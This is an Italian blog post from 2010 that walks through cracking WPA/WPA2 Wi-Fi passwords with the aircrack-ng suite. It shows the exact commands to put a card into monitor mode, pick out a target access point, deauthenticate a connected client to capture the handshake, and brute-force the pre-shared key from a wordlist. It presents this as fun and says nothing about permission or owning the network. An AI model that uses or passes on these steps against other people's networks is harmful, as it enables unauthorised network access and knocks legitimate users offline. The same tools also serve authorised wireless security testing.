lunedì 13 dicembre 2010

WPA/WPA2 'Brute Force' Crack



Oggi parleremo di come cracckare una rete protetta da cifratura WPA o WPA2.
Il metodo è simile a quello usato per le reti WEP, con la differenza che qui abbiamo bisogno di un “Dizionario” (word list). Analizzando la rete dobbiamo catturare l’HANDSHAKE appartenente a quella rete e usare la FORZA BRUTA per trovare la PASSWORD.
In cosa consiste questa BRUTE FORCE? In pratica una volta trovato questo HANDSHAKE noi proviamo tutte le parole/lettere/numeri   presenti nella nostra WORDLIST in modo da trovarne la PSK (pre shared key).
E’ facile capire che se noi abbiamo una wordlist da 10.000.000 di parole e la nostra password è alla fine di questa lista, ci vorrà molto tempo prima di trovare la password corretta. Solitamente un dual core può analizzare circa 300-400 pass al secondo. A questo problema ci viene in contro la nuova tecnologia CUDA di nVidia che permette di sfruttare la potenza di calcolo della nostra GPU (della scheda video), ma di questo ne parleremo in un altro articolo.
Dopo questa premessa, la prima cosa da fare per craccare una WPA/WPA2 è avere una buona WORDLIST. Queste si possono reperire molto facilmente su internet (GOOGLE) oppure è possibile crearsene una personale, ma anche di questo ne parleremo in un altro articolo.
Adesso che abbiamo la nostra wordlist, possiamo cominciare con il vero divertimento:


1) Mettiamo la nostra scheda wifi in monitor mode
sudo airmon-ng start wlan0

-wlan0 è l’interfaccia wifi  (usare iwconfig da terminale per vedere la propria)
Molto probabilmente verrà creata un’interfaccia mon0 al posto di wlan0,  noi useremo sempre mon0 dopo questo passaggio.

2) Ora tramite la monitor mode possiamo scansionare la rete in cerca di AP con protezione WPA/WPA2
sudo airodump-ng –write cap mon0

-   –write crea dei pacchetti cap.cap
- mon0 è l’interfaccia wlan0 in monitor mode
In questo modo possiamo vedere tutte le reti presenti nelle vicinanze e scegliere il nostro bersaglio.

3) Ora concentriamoci sul nostro obiettivo:
sudo airodump-ng -c [canale AP] –bssid [MAC AP] –write cap mon0

Uguale a prima, ma in questo modo analizziamo solo i pacchetti di un singolo AP. La rete deve essere PSK (pre shared key) altrimenti non è possibile usare il brute force e quindi non è possibile tentare di craccarla.

4) Usare aireplay-ng per  deautenticare il client connesso
aireplay-ng -0 5 -a [MAC AP] -c [MAC mia scheda] mon0

-0 è il  deauthentication mode
-5  è il numero di  gruppi  di pacchetti  deauthentication da mandare
Terminato questo comando, nella SHELL dove abbiamo eseguito il punto 3, dovremo vedere comparire il alto a destra “HANDSHAKE”, se questo non compare non possiamo cracckare la rete.

5) Avviare  aircrack-ng per recuperare la  pre-shared key
aircrack-ng -w [dizionario] -b [MAC AP] cap*.cap

-w dizionario è il nome del file dizionario
-  *.cap è il l’lenco dei file di capture che abbiamo collezionato
Se tutto è andato a buon fine avremo come risultato un bellissimo KEY FOUND!

Spesso capita di non riuscire a trovare l’HANDSHAKE, questo può essere dovuto al fatto che per poterlo catturare è necessario essere nella stessa modalità (a/b/g/n) e averete lo stesso rate di dati dell’AP. Possiamo risolvere questo problema provando diverse modalità e diversi rate:

6) Cambiare il rate
iwconfig ath0 rate [auto,1M,2M,5.5M,6M,9M,11M,18M,24M,36M,48M,54M]

A volte la soluzione migliore può essere provare subito  1M  come rate.

7) Cambiare la modalità
iwpriv ath0 mode 2

Mode 0 Automatic (a/b/g)
Mode 1 solo 802.11a
Mode 2 solo 802.11b
Mode 3 solo 802.11g

Per ulteriori chiarimenti o suggerimenti sull’articolo scrivetemi pure.

Nessun commento:

Posta un commento